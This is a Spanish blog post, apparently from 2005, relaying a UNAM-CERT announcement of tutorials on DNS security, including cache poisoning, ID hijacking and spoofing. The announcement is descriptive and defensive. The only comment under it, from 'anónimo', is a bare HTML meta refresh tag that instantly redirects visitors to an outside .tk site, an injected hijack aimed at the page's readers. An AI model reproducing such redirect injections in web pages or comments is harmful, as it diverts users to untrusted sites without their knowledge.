Articulos sobre seguridad en nombres de dominio y en el servicio DNS
Abril 11, 05 by adminUNAM-CERT nos ha remitido una nota en la cual nos comentan unos nuevos artÃculos que han realizado sobre la seguridad en nombres de dominio y en DNS:
« Ante los recientes problemas de Secuestro de dominos y de DNS cache Poisoning, que han comenzado a impactar en el uso de internet, el Departamento de Seguridad en Cómputo y el UNAM-CERT, como parte de la difusion e investigación que lleva a cabo, informa de la liberación de un espacio en el sitio del Laboratorio de Seguridad para el proyecto de Seguridad en DNS, con el propósito de dar a conocer información sobre tópico de seguridad relacionados al Sistema de Nombres de Dominio.
Actualmente el sitio web cuenta con tutoriales y articulos selacionados al DNS.
En el se discute dos de los problemas mas comunes hoy dia en Internet como son : DNS Cache Poisoning y DNS Hijacking.
Proximamente se liberaran más documentos sobre RFCs relacionados al DNS, un Comparativo entre distintas implementaciones de DNS, DNSSEC y temas relacionados que puedan ser de utilidad para la comunidad universitaria y al publico en general.
Los documentos que actualmente se encuentran en el portal son:
* Introduccion al DNS
=====================
Divido en cutro partes, este documento describe el funcionamiento y los conceptos basicos del DNS. Este tutorial esta dirigido a las personas que deseen conocer como funciona el DNS y sus caracterìsticas principales.
* Ataque DNS Cache Poisoning
============================
En este articulo se describe el funcionamiento del ataque conocido como Cache Poisoning, el cual consiste en incluir registros falsos en el cache del DNS. Mediante la manipulacion del DNS, el intruso puede enviar al usuario a un sitio falso para obtener informacion sensible.
*Ataque DNS ID Hijacking.
==========================
Este tipo de ataque esta relacionado con vulnerabilidades en el protocolo del DNS, por lo cual ninguna implementación se ha visto ajena a este problema. Dada su carga tecnica, este es un documento que mediante ejemplos sencillos esquematiza su funcionamiento.
* Ataque DNS Spoofing
=====================
Este tipo de ataque, muy similar en esencia a los anteriores, busca engañar al cliente de DNS para consultar un sitio falso. Este tipo de ataque ha sido solucionado en muchas implementaciones, sin embargo, es importante conocer su funcionamiento.
El Departamento de Seguridad en Computo y el UNAM-CERT, a través del Proyecto de Seguridad en DNS, esta interesado en conocer sus comentarios y de esta forma obtener la retroalimentacion por parte de la comunidad de cómputo interesado en el trabajo actual y futuro; además de conocer la problemática en este tema que pueda ser cubierto en este espacio. »
El sitio puede ser accedido a través de la siguiente dirección:
anónimo Says: 12.05.05 at 21:21
<meta HTTP-EQUIV="Refresh" CONTENT="0;URL=http://mbytte.tk">